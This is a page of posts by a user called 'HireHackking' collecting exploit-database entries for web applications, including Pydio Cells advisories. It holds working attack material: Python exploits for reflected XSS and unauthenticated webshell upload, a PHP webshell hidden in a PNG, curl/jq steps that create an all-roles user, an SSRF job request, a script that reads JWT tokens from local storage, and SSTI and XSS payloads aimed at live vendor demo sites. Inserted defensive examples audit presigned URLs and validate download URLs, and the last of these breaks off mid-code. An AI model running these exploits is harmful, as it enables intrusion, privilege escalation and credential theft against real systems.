
Everything posted by HireHackking
-
Online Security Guards Hiring System 1.0 - Reflected XSS
#Exploit Title: Online Security Guards Hiring System 1.0 – REFLECTED XSS
#Google Dork : NA
#Date: 23-01-2023
#Exploit Author : AFFAN AHMED
#Vendor Homepage: https://phpgurukul.com
#Software Link: https://phpgurukul.com/projects/Online-Security-Guard-Hiring-System_PHP.zip
#Version: 1.0
#Tested on: Windows 11 + XAMPP + PYTHON-3.X
#CVE : CVE-2023-0527
#NOTE: TO RUN THE PROGRAM FIRST SETUP THE CODE WITH XAMPP AND THEN RUN THE BELOW PYTHON CODE TO EXPLOIT IT
# The code below checks both the parameter in /admin-profile.php and the one in /search.php
#POC-LINK: https://github.com/ctflearner/Vulnerability/blob/main/Online-Security-guard-POC.md

import requests
import re
from colorama import Fore

print(Fore.YELLOW + "######################################################################" + Fore.RESET)
print(Fore.RED + "# TITLE: Online Security Guards Hiring System v1.0" + Fore.RESET)
print(Fore.RED + "# VULNERABILITY-TYPE : CROSS-SITE SCRIPTING (XSS)" + Fore.RESET)
print(Fore.RED + "# VENDOR OF THE PRODUCT : PHPGURUKUL" + Fore.RESET)
print(Fore.RED + "# AUTHOR : AFFAN AHMED" + Fore.RESET)
print(Fore.YELLOW + "######################################################################" + Fore.RESET)
print()
print(Fore.RED + "NOTE: To RUN THE CODE JUST TYPE : python3 exploit.py" + Fore.RESET)
print()

# NAVIGATING TO ADMIN LOGIN PAGE
Website_url = "http://localhost/osghs/admin/login.php"  # CHANGE THE URL ACCORDING TO YOUR SETUP

print(Fore.RED + "----------------------------------------------------------------------" + Fore.RESET)
print(Fore.CYAN + "[**] Inserting the Username and Password in the Admin Login Form [**]" + Fore.RESET)
print(Fore.RED + "----------------------------------------------------------------------" + Fore.RESET)

Admin_login_credentials = {'username': 'admin', 'password': 'Test@123', 'login': ''}

# A fixed PHPSESSID is sent with every request so that the login and the
# later profile update share the same server-side session
headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
    'Referer': 'http://localhost/osghs/admin/login.php',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'en-US,en;q=0.9',
    'Connection': 'close',
    'Cookie': 'PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc',
    'Sec-Fetch-Site': 'same-origin',
    'Sec-Fetch-Mode': 'navigate',
    'Sec-Fetch-User': '?1',
    'Sec-Fetch-Dest': 'document'
}

response = requests.request("POST", Website_url, headers=headers, data=Admin_login_credentials)

if response.status_code == 200:
    # A successful login answers with an inline "document.location = '...'" redirect
    location = re.findall(r'document.location =\'(.*?)\'', response.text)
    if location:
        print(Fore.GREEN + "> Login Successful into Admin Account" + Fore.RESET)
        print(Fore.GREEN + "> Popup:" + Fore.RESET, location)
    else:
        print(Fore.GREEN + "> document.location not found" + Fore.RESET)
else:
    # status_code is an int, so it is passed as a separate argument instead of being concatenated
    print(Fore.GREEN + "> Error:", response.status_code, Fore.RESET)

print(Fore.RED + "----------------------------------------------------------------------" + Fore.RESET)
print(Fore.CYAN + " [**] Trying XSS-PAYLOAD in Admin-Name Parameter [**]" + Fore.RESET)

# NAVIGATING TO ADMIN PROFILE SECTION TO UPDATE ADMIN PROFILE
# INSTEAD OF /ADMIN-PROFILE.PHP REPLACE WITH /search.php TO FIND XSS IN SEARCH PARAMETER
Website_url = "http://localhost/osghs/admin/admin-profile.php"  # CHANGE THIS URL ACCORDING TO YOUR PREFERENCE

# FOR CHECKING XSS IN ADMIN-PROFILE USE THE BELOW PAYLOAD
# FOR CHECKING XSS IN SEARCH.PHP SECTION REPLACE EVERYTHING AND PUT searchdata=<your-xss-payload>&search=""
payload = {
    "adminname": "TESTAdmin<script>alert(\"From-Admin-Name\")</script>",  # XSS-Payload , CHANGE THIS ACCORDING TO YOUR PREFERENCE
    "username": "admin",  # THESE DETAILS ARE RANDOM , CHANGE IT TO YOUR PREFERENCE
    "mobilenumber": "8979555558",
    "email": "admin@gmail.com",
    "submit": "",
}

# SENDING THE RESPONSE WITH POST REQUEST
response = requests.post(Website_url, headers=headers, data=payload)

print(Fore.RED + "----------------------------------------------------------------------" + Fore.RESET)

# CHECKING THE STATUS CODE 200 AND ALSO FINDING THE SCRIPT TAG WITH THE HELP OF REGEX
if response.status_code == 200:
    scripts = re.findall(r'<script>alert\(.*?\)</script>', response.text)
    print(Fore.GREEN + "> Response After Executing the Payload at adminname parameter : " + Fore.RESET)
    print(Fore.GREEN + ">" + Fore.RESET, scripts)
-
Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download
Exploit Title: Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download
Affected Versions: 4.1.2 and earlier versions
Fixed Versions: 4.2.0, 4.1.3, 3.0.12
Vulnerability Type: Cross-Site Scripting
Security Risk: high
Vendor URL: https://pydio.com/
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-004
Advisory Status: published
CVE: CVE-2023-32751
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32751

Introduction
============

"Pydio Cells is an open-core, self-hosted Document Sharing and
Collaboration platform (DSC) specifically designed for organizations
that need advanced document sharing and collaboration without security
trade-offs or compliance issues."

(from the vendor's homepage)

More Details
============

When a file named "xss.html" is downloaded in the Pydio Cells web
application, a download URL similar to the following is generated:

https://example.com/io/xss/xss.html
  ?AWSAccessKeyId=gateway
  &Expires=1682495748
  &Signature=920JV0Zy%2BrNYXjak7xksAxRpRp8%3D
  &response-content-disposition=attachment%3B%20filename%3Dxss.html
  &pydio_jwt=qIe9DUut-OicxRzNVlynMf6CTENB0J-J[...]

The URL is akin to a presigned URL as used by the Amazon S3 service. It
contains the URL parameter "response-content-disposition" which is set
to "attachment", causing the response to contain a "Content-Disposition"
header with that value. Therefore, the browser downloads the file
instead of interpreting it. The URL also contains a signature and expiry
timestamp, which are checked by the backend. Unlike a presigned URL as
used by S3, the URL also contains the parameter "pydio_jwt" with the JWT
of the user for authentication.

Furthermore, the access key with the ID "gateway" is referenced, which
can be found in the JavaScript sources of Pydio Cells together with the
secret:

------------------------------------------------------------------------
_awsSdk.default.config.update({
    accessKeyId: 'gateway',
    secretAccessKey: 'gatewaysecret',
    s3ForcePathStyle: !0,
    httpOptions: {
        timeout: PydioApi.getMultipartUploadTimeout()
    }
});
------------------------------------------------------------------------

With this information it is possible to change the URL parameter
"response-content-disposition" to the value "inline" and then calculate
a valid signature for the resulting URL. Furthermore, the content type
of the response can be changed to "text/html" by also adding the URL
parameter "response-content-type" with that value. This would result in
a URL like the following for the previously shown example URL:

https://example.com/io/xss/xss.html
  ?AWSAccessKeyId=gateway
  &Expires=1682495668
  &Signature=HpKue0YQZrnp%2B665Jf1t7ONgfRg%3D
  &response-content-disposition=inline
  &response-content-type=text%2Fhtml
  &pydio_jwt=qIe9DUut-OicxRzNVlynMf6CTENB0J-J[...]

Upon opening the URL in a browser, the HTML included in the file is
interpreted and any JavaScript code is run.

Proof of Concept
================

Upload an HTML file into an arbitrary location of a Pydio Cells
instance. For example with the following contents:

------------------------------------------------------------------------
<html>
<body>
<h1>Cross-Site Scripting</h1>
<script>
let token = JSON.parse(localStorage.token4).AccessToken;
alert(token);
</script>
</body>
</html>
------------------------------------------------------------------------

The contained JavaScript code reads the JWT access token for Pydio Cells
from the browser's local storage object and opens a message box. Instead
of just displaying the JWT, it could also be sent to an attacker.

The following JavaScript function can then be run within the browser's
developer console to generate a presigned URL for the HTML file:

------------------------------------------------------------------------
async function getPresignedURL(path) {
    let client = PydioApi.getClient();
    let node = new AjxpNode(path);
    let metadata = {
        Bucket: "io",
        ResponseContentDisposition: "inline",
        Key: path,
        ResponseContentType: "text/html"
    };
    let url = await client.buildPresignedGetUrl(node, null, "text/html", metadata);
    return url;
}

await getPresignedURL("xss/xss.html");
------------------------------------------------------------------------

The code has to be run in the context of Pydio Cells while being logged
in. If the resulting URL is opened in a browser, the JavaScript code
contained in the HTML file is run.

If the attack is conducted in the described way, the JWT of the attacker
is exposed through the URL. However, this can be circumvented by first
generating a public URL for the file and then constructing the presigned
URL based on the resulting download URL.

Workaround
==========

No workaround known.

Fix
===

Upgrade Pydio Cells to a version without the vulnerability.

Security Risk
=============

Attackers that can upload files to a Pydio Cells instance can construct
URLs that execute arbitrary JavaScript code in the context of Pydio Cells
upon opening. This could for example be used to steal the authentication
tokens of users opening the URL. It is likely that such an attack
succeeds, since sharing URLs to files hosted using Pydio Cells is a
common use case of the application. Therefore, the vulnerability is
estimated to pose a high risk.

Timeline
========

2023-03-23 Vulnerability identified
2023-05-02 Customer approved disclosure to vendor
2023-05-02 Vendor notified
2023-05-03 CVE ID requested
2023-05-08 Vendor released fixed version
2023-05-14 CVE ID assigned
2023-05-16 Vendor asks for a few more days before the advisory is released
2023-05-30 Advisory released

References
==========

[1] https://aws.amazon.com/sdk-for-javascript/

RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/

Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/

--
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
Alter Posthof 1                           Fax : +49 241 510081-99
52062 Aachen                              https://www.redteam-pentesting.de
Germany                                   Registergericht: Aachen HRB 14004
                                          Geschäftsführer: Patrick Hof, Jens Liebchen
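The advisory turns on two query parameters of an S3-style presigned URL: "response-content-disposition" and "response-content-type". A defender reviewing access logs can audit those parameters directly. The following is an added example, not code from the RedTeam advisory or from Pydio Cells: it parses the query string of each request, flags a disposition other than "attachment" and a browser-renderable content type, and runs that check over constructed access-log lines in the format shown in the advisory. The log lines, signatures and timestamps are made up for the demo.

```python
"""Audit presigned download URLs for response-header overrides.

Added example; this is not code from the RedTeam advisory or from Pydio
Cells. It inspects the query string of S3-style presigned URLs (the
format the advisory shows) and flags values of "response-content-disposition"
and "response-content-type" that would make a browser render user-uploaded
content instead of downloading it. The access-log lines are constructed.
"""
import re
from urllib.parse import urlparse, parse_qs

# MIME types a browser will execute or render as a document.
RENDERABLE_TYPES = {
    "text/html", "application/xhtml+xml", "image/svg+xml",
    "text/xml", "application/xml",
}


def audit_presigned_url(url):
    """Return a list of findings; an empty list means the URL only allows a download."""
    findings = []
    query = parse_qs(urlparse(url).query, keep_blank_values=True)
    disposition = query.get("response-content-disposition", [""])[0]
    content_type = query.get("response-content-type", [""])[0]

    # Legitimate download links carry "attachment; filename=...". Any other
    # disposition type (notably "inline") lets the browser interpret the body.
    disp_type = disposition.split(";", 1)[0].strip().lower()
    if disposition and disp_type != "attachment":
        findings.append("response-content-disposition=%s overrides the download" % disp_type)

    media_type = content_type.split(";", 1)[0].strip().lower()
    if media_type in RENDERABLE_TYPES:
        findings.append("response-content-type=%s is renderable by the browser" % media_type)
    return findings


# Constructed access-log lines in common log format (not real traffic).
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [30/May/2023:10:00:01 +0000] "GET /io/xss/xss.html?AWSAccessKeyId=gateway'
    '&Expires=1682495748&Signature=abc%3D&response-content-disposition=attachment%3B%20filename%3Dxss.html HTTP/1.1" 200 512',
    '10.0.0.5 - - [30/May/2023:10:00:07 +0000] "GET /io/xss/xss.html?AWSAccessKeyId=gateway'
    '&Expires=1682495668&Signature=def%3D&response-content-disposition=inline&response-content-type=text%2Fhtml HTTP/1.1" 200 512',
    '10.0.0.9 - - [30/May/2023:10:00:09 +0000] "GET /io/docs/report.pdf?AWSAccessKeyId=gateway'
    '&Expires=1682495700&Signature=ghi%3D&response-content-disposition=inline&response-content-type=application%2Fpdf HTTP/1.1" 200 9000',
]

REQUEST_RE = re.compile(r'"(?:GET|HEAD) (\S+) HTTP/')


def scan_access_log(lines):
    """Return (request_path, findings) for every request that allows inline rendering."""
    flagged = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        path = match.group(1)
        findings = audit_presigned_url(path)
        if findings:
            flagged.append((path, findings))
    return flagged


if __name__ == "__main__":
    for path, findings in scan_access_log(SAMPLE_ACCESS_LOG):
        print(path.split("?", 1)[0])
        for finding in findings:
            print("  -", finding)
```

Any "inline" disposition is reported, because the legitimate download flow in the advisory never produces one; the content-type check is restricted to types a browser will actually render, so an inline PDF produces one finding and an inline HTML document produces two. The same check, applied server-side to the parameters before the signature is verified, is the shape of the fix: reject overrides rather than sign them.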
-
Pydio Cells 4.1.2 - Unauthorised Role Assignments
Exploit Title: Pydio Cells 4.1.2 - Unauthorised Role Assignments
Affected Versions: 4.1.2 and earlier versions
Fixed Versions: 4.2.0, 4.1.3, 3.0.12
Vulnerability Type: Privilege Escalation
Security Risk: high
Vendor URL: https://pydio.com/
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-003
Advisory Status: published
CVE: CVE-2023-32749
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32749

Introduction
============

"Pydio Cells is an open-core, self-hosted Document Sharing and
Collaboration platform (DSC) specifically designed for organizations
that need advanced document sharing and collaboration without security
trade-offs or compliance issues."

(from the vendor's homepage)

More Details
============

Users can share cells or folders with other users on the same Pydio
instance. The web application allows either selecting an already
existing user from a list or creating a new user by entering a new
username and password, if this functionality is enabled. When creating
a new user in this way, an HTTP PUT request like the following is sent:

------------------------------------------------------------------------
PUT /a/user/newuser HTTP/2
Host: example.com
User-Agent: agent
Authorization: Bearer O48gvjD[...]
Content-Type: application/json
Content-Length: 628
Cookie: token=AO[...]

{
  "Attributes": {
    "profile": "shared",
    "parameter:core.conf:lang": "\"en-us\"",
    "send_email": "false"
  },
  "Roles": [],
  "Login": "newuser",
  "Password": "secret!",
  "GroupPath": "/",
  "Policies": [...]
}
------------------------------------------------------------------------

The JSON object sent in the body contains the username and password for
the user to be created and an empty list for the key "Roles". The
response contains a JSON object similar to the following:

------------------------------------------------------------------------
{
  "Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce",
  "GroupPath": "/",
  "Attributes": {
    "parameter:core.conf:lang": "\"en-us\"",
    "profile": "shared"
  },
  "Roles": [
    {
      "Uuid": "EXTERNAL_USERS",
      "Label": "External Users",
      "Policies": [...]
    },
    {
      "Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce",
      "Label": "User newuser",
      "UserRole": true,
      "Policies": [...]
    }
  ],
  "Login": "newuser",
  "Policies": [....],
  "PoliciesContextEditable": true
}
------------------------------------------------------------------------

The key "Roles" now contains a list with two objects, which seem to be
applied by default. The roles list in the HTTP request can be modified
to contain a list of all available UUIDs for roles, which can be
obtained by using the user search functionality. This results in a new
user account with all roles applied. By performing a login as the newly
created user, access to all cells and non-personal workspaces of the
whole Pydio instance is granted.

Proof of Concept
================

Log in to the Pydio Cells web interface with a regular user and retrieve
the JWT from the HTTP requests. This can either be done using an HTTP
attack proxy or using the browser's developer tools.

Subsequently, curl [1] can be used as follows to retrieve a list of all
users and their roles:

------------------------------------------------------------------------
$ export JWT="<insert JWT here>"
$ curl --silent \
    --header "Authorization: Bearer $JWT" \
    --header 'Content-Type: application/json' \
    --data '{}' \
    https://example.com/a/user | tee all_users.json
{"Users":[...]}
------------------------------------------------------------------------

Afterwards, jq [2] can be used to create a JSON document which can be
sent to the Pydio REST-API in order to create the external user "foobar"
with the password "hunter2" and all roles assigned:

------------------------------------------------------------------------
$ jq '.Users[].Roles' all_users.json \
    | jq -s 'flatten | .[].Uuid | {Uuid: .}' \
    | jq -s 'unique' \
    | jq '{"Login": "foobar", "Password": "hunter2", "Attributes": {"profile": "shared"}, "Roles": .}' \
    | tee create_user.json
{
  "Login": "foobar",
  "Password": "hunter2",
  "Attributes": {
    "profile": "shared"
  },
  "Roles": [...]
}
------------------------------------------------------------------------

Finally, the following curl command can be issued to create the new
external user:

------------------------------------------------------------------------
$ curl --request PUT \
    --silent \
    --header "Authorization: Bearer $JWT" \
    --header 'Content-Type: application/json' \
    --data @create_user.json \
    https://example.com/a/user/foobar
------------------------------------------------------------------------

Now, log in with the newly created user to access all cells and
non-personal workspaces.

Workaround
==========

Disallow the creation of external users in the authentication settings.

Fix
===

Upgrade Pydio Cells to a version without the vulnerability.

Security Risk
=============

Attackers with access to any regular user account for a Pydio Cells
instance can extend their privileges by creating a new external user
with all roles assigned. Subsequently, they can access all folders and
files in any cell and workspace, except for personal workspaces. The
creation of external users is activated by default. Therefore, the
vulnerability is estimated to pose a high risk.

Timeline
========

2023-03-23 Vulnerability identified
2023-05-02 Customer approved disclosure to vendor
2023-05-02 Vendor notified
2023-05-03 CVE ID requested
2023-05-08 Vendor released fixed version
2023-05-14 CVE ID assigned
2023-05-16 Vendor asks for a few more days before the advisory is released
2023-05-30 Advisory released

References
==========

[1] https://curl.se/
[2] https://stedolan.github.io/jq/
-
Faculty Evaluation System 1.0 - Unauthenticated File Upload
# Exploit Title: Faculty Evaluation System 1.0 - Unauthenticated File Upload
# Date: 5/29/2023
# Author: Alex Gan
# Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/eval_2.zip
# Version: 1.0
# Tested on: LAMP Fedora server 38 (Thirty Eight) Apache/2.4.57 10.5.19-MariaDB PHP 8.2.6
# CVE: CVE-2023-33440
# References: https://nvd.nist.gov/vuln/detail/CVE-2023-33440
#             https://www.exploit-db.com/exploits/49320
#             https://github.com/F14me7wq/bug_report/tree/main/vendors/oretnom23/faculty-evaluation-system
#
#!/usr/bin/env python3

import os
import sys
import requests
import argparse
from bs4 import BeautifulSoup
from urllib.parse import urlparse
from requests.exceptions import ConnectionError, Timeout


def get_args():
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--url', type=str, help='URL')
    parser.add_argument('-p', '--payload', type=str, help='PHP webshell')
    return parser.parse_args()


def get_user_input(args):
    # Fall back to interactive prompts for any argument that was not given
    if not args.url:
        args.url = input('Use the -u argument or Enter URL: ')
    if not args.payload:
        args.payload = input('Use the -p argument or Enter file path PHP webshell: ')
    return args.url, args.payload


def check_input_url(url):
    # Default to http:// when no scheme is given and drop a trailing slash
    parsed_url = urlparse(url)
    if not parsed_url.scheme:
        url = 'http://' + url
    if url.endswith('/'):
        url = url.rstrip('/')
    return url


def check_host_availability(url):
    try:
        response = requests.head(url=url + '/login.php', timeout=10)
        if response.status_code == 200:
            print("[+] Host is accessible")
        else:
            print("[-] Host is not accessible")
            print("    Status code:", response.status_code)
            sys.exit()
    except (ConnectionError, Timeout):
        print("[-] Host is not accessible")
        sys.exit()
    except requests.exceptions.RequestException as e:
        print("[-] Error:", e)
        sys.exit()


def make_request(url, method, files=None):
    if method == 'GET':
        response = requests.get(url)
    elif method == 'POST':
        response = requests.post(url, files=files)
    else:
        raise ValueError(f'Invalid HTTP method: {method}')
    if response.status_code == 200:
        print('[+] Request successful')
        return response.text
    else:
        print(f'[-] Error {response.status_code}: {response.text}')
        return None


def find_file(response_get, filename, find_url):
    # Parse the directory listing and collect every link ending in the uploaded filename
    soup = BeautifulSoup(response_get, 'html.parser')
    found_files = []
    for link in soup.find_all('a'):
        file_upl = link.get('href')
        # Anchors without an href attribute return None and are skipped
        if file_upl and file_upl.endswith(filename):
            found_files.append(file_upl)
    if found_files:
        print('    File found:')
        for file in found_files:
            print('[*] ' + file)
        print('    Full URL of your file:')
        for file_url in found_files:
            print('[*] ' + find_url + file_url)
    else:
        print('[-] File not found')


def main():
    args = get_args()
    url, payload = get_user_input(args)
    url = check_input_url(url)
    check_host_availability(url)
    post_url = url + "/ajax.php?action=save_user"
    get_url = url + "/assets/uploads/"
    filename = os.path.basename(payload)
    with open(payload, 'rb') as fh:
        payload_file = [('img', (filename, fh, 'application/octet-stream'))]
        print("    Loading payload file")
        make_request(post_url, 'POST', files=payload_file)
    print("    Listing the uploads directory")
    response_get = make_request(get_url, 'GET')
    if response_get is None:
        # No directory listing to search through
        sys.exit()
    print("    Finding the downloaded payload file")
    find_file(response_get, filename, get_url)


if __name__ == "__main__":
    main()
-
Total CMS 1.7.4 - Remote Code Execution (RCE)
# Exploit Title: Total CMS 1.7.4 - Remote Code Execution (RCE)
# Date: 02/06/2023
# Exploit Author: tmrswrr
# Version: 1.7.4
# Vendor home page : https://www.totalcms.co/

1) Go to this page and click the edit page button: https://www.totalcms.co/demo/soccer/

2) Then scroll down and you will see the downloads area

3) Add a shell.php file in this area:

?PNG
...
<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>" ?>
IEND

4) Then open this file and write commands:

https://www.totalcms.co/cms-data/depot/cmssoccerdepot/shell.php?cmd=id

Result :

?PNG
...
uid=996(caddy) gid=998(caddy) groups=998(caddy),33(www-data)
IEND
-
MotoCMS Version 3.4.3 - Server-Side Template Injection (SSTI)
# Title: MotoCMS Version 3.4.3 - Server-Side Template Injection (SSTI)
# Author: tmrswrr
# Date: 31/05/2023
# Vendor: https://www.motocms.com
# Link: https://www.motocms.com/website-templates/demo/189526.html
# Vulnerable Version(s): MotoCMS 3.0.27

## Description

MotoCMS Version 3.4.3 Store Category Template was discovered to contain a Server-Side Template Injection (SSTI) vulnerability via the keyword parameter.

## Steps to Reproduce

1. Open the target URL: https://template189526.motopreview.com/
2. Write the payload here: https://template189526.motopreview.com/store/category/search/?page=1&limit=36&keyword={{7*7}}
3. You will see that the result is 49

Vuln Url : https://template189526.motopreview.com/store/category/search/?page=1&limit=36&keyword={{7*7}}

GET /store/category/search/?page=&limit=&keyword={{7*7}} HTTP/1.1
Host: template189526.motopreview.com
Cookie: PHPSESSID=7c0qgdvsehaf1a2do6s0bcl4p0; 9b7029e0bd3be0d41ebefd47d9f5ae46_session-started=1685536759239
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Referer: https://template189526.motopreview.com/store/category/search/?keyword=%7B%7B3*3%7D%7D
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
-
Barebones CMS v2.0.2 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Exploit Title: Barebones CMS v2.0.2 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 2023-06-03
# Exploit Author: tmrswrr
# Vendor Homepage: https://barebonescms.com/
# Software Link: https://github.com/cubiclesoft/barebones-cms/archive/master.zip
# Version: v2.0.2
# Tested : https://demo.barebonescms.com/

--- Description ---

1) Log in to the admin panel and go to a new story:
   https://demo.barebonescms.com/sessions/127.0.0.1/moors-sluses/admin/?action=addeditasset&type=story&sec_t=241bac393bb576b2538613a18de8c01184323540

2) Click the edit button and write your payload in the title field:

   Payload: "><script>alert(1)</script>

3) After saving the change you will see the alert box

POST /sessions/127.0.0.1/moors-sluses/admin/ HTTP/1.1
Host: demo.barebonescms.com
Cookie: PHPSESSID=81ecf7072ed639fa2fda1347883265a4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 237
Origin: https://demo.barebonescms.com
Dnt: 1
Referer: https://demo.barebonescms.com/sessions/78.163.184.240/moors-sluses/admin/?action=addeditasset&id=1&type=story&lang=en-us&sec_t=241bac393bb576b2538613a18de8c01184323540
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

action=saveasset&id=1&revision=0&type=story&sec_t=a6adec1ffa60ca5adf4377df100719b952d3f596&lang=en-us&title=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&newtag=&publish_date=2023-06-03&publish_time=12%3A07+am&unpublish_date=&unpublish_time=
-
Pydio Cells 4.1.2 - Server-Side Request Forgery
Exploit Title: Pydio Cells 4.1.2 - Server-Side Request Forgery
Affected Versions: 4.1.2 and earlier versions
Fixed Versions: 4.2.0, 4.1.3, 3.0.12
Vulnerability Type: Server-Side Request Forgery
Security Risk: medium
Vendor URL: https://pydio.com/
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-005
Advisory Status: published
CVE: CVE-2023-32750
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32750

Introduction
============

"Pydio Cells is an open-core, self-hosted Document Sharing and
Collaboration platform (DSC) specifically designed for organizations
that need advanced document sharing and collaboration without security
trade-offs or compliance issues."

(from the vendor's homepage)

More Details
============

Using the REST-API of Pydio Cells it is possible to start jobs. For
example, when renaming a file or folder an HTTP request similar to the
following is sent:

------------------------------------------------------------------------
PUT /a/jobs/user/move HTTP/2
Host: example.com
User-Agent: agent
Accept: application/json
Authorization: Bearer G4ZRN[...]
Content-Type: application/json
Content-Length: 140

{
  "JobName": "move",
  "JsonParameters": "{\"nodes\":[\"cell/file.txt\"],\"target\":\"cell/renamed.txt\",\"targetParent\":false}"
}
------------------------------------------------------------------------

The body contains a JSON object with a job name and additional
parameters for the job. Besides the "move" job, a job with the name
"remote-download" also exists. It takes two additional parameters:
"urls" and "target". In the "urls" parameter, a list of URLs can be
specified and in the parameter "target" a path can be specified in which
to save the response. When the job is started, HTTP GET requests are
sent from the Pydio Cells server to the specified URLs. Each response is
saved into a file, which is uploaded to the specified folder within
Pydio Cells. Potential errors are transmitted in a WebSocket channel,
which can be opened through the "/ws/event" endpoint.

Proof of Concept
================

Log into Pydio Cells and retrieve the JWT from the HTTP requests. Then,
run the following commands to start a "remote-download" job to trigger
an HTTP request:

------------------------------------------------------------------------
$ export JWT="<insert JWT here>"
$ echo '{"urls": ["http://localhost:8000/internal.html"], "target": "personal-files"}' \
    | jq '{"JobName": "remote-download", "JsonParameters": (. | tostring)}' \
    | tee remote-download.json
$ curl --header "Authorization: Bearer $JWT" \
    --header 'Content-Type: application/json' \
    --request PUT \
    --data @remote-download.json 'https://example.com/a/jobs/user/remote-download'
------------------------------------------------------------------------

The URL in the JSON document specifies which URL to request. The
"target" field in the same document specifies into which folder the
response is saved. Afterwards, the response is contained in a file in
the specified folder. Potential errors are communicated through the
WebSocket channel.

Workaround
==========

Limit the services which can be reached by the Pydio Cells server, for
example using an outbound firewall.

Fix
===

Upgrade Pydio Cells to a version without the vulnerability.

Security Risk
=============

The risk is highly dependent on the environment in which the attacked
Pydio Cells instance runs. If there are any internal HTTP services which
expose sensitive data on the same machine or within the same network,
the server-side request forgery vulnerability could pose a significant
risk. In other circumstances, the risk could be negligible. Therefore,
overall the vulnerability is rated as a medium risk.

Timeline
========

2023-03-23 Vulnerability identified
2023-05-02 Customer approved disclosure to vendor
2023-05-02 Vendor notified
2023-05-03 CVE ID requested
2023-05-08 Vendor released fixed version
2023-05-14 CVE ID assigned
2023-05-16 Vendor asks for a few more days before the advisory is released
2023-05-30 Advisory released
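The advisory's workaround is an outbound firewall; the application-level counterpart is to validate every URL in the job's "urls" list before the server fetches it. The block below is an added example, not Pydio Cells code and not part of the advisory: it applies a scheme allowlist, rejects embedded credentials and blocked hostnames, and rejects IP literals in loopback, private, link-local and other non-routable ranges, then runs that check over a job document constructed in the "JsonParameters" shape the advisory shows. To stay runnable offline it does not resolve hostnames; the comment marks the resolution step as an assumption that a real deployment must perform on every resolved address and again after each redirect.

```python
"""Validate the URLs of a "remote-download" style job before the server fetches them.

Added example; this is not Pydio Cells code and not part of the advisory.
It shows the destination check a server-side fetch should apply to each
entry of the "urls" job parameter. Only IP literals are inspected here so
the code runs offline; the DNS resolution step is an assumption noted below.
"""
import ipaddress
import json
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Hostnames that must never be fetched regardless of what they resolve to.
BLOCKED_HOSTNAMES = {"localhost", "metadata.google.internal"}


def is_non_routable(ip_text):
    """True for loopback, private, link-local, multicast, reserved or unspecified addresses."""
    addr = ipaddress.ip_address(ip_text)
    # Treat IPv4-mapped IPv6 addresses (::ffff:127.0.0.1) as their IPv4 form.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def validate_download_url(url):
    """Return (allowed, reason) for one URL."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % scheme
    host = parts.hostname
    if not host:
        return False, "missing host"
    if parts.username is not None or parts.password is not None:
        return False, "credentials embedded in URL"
    host_l = host.lower().rstrip(".")
    if host_l in BLOCKED_HOSTNAMES or host_l.endswith(".localhost"):
        return False, "hostname %r is blocked" % host
    try:
        if is_non_routable(host_l):
            return False, "address %s is not routable" % host
    except ValueError:
        # Not an IP literal. Assumption: the caller resolves the name and
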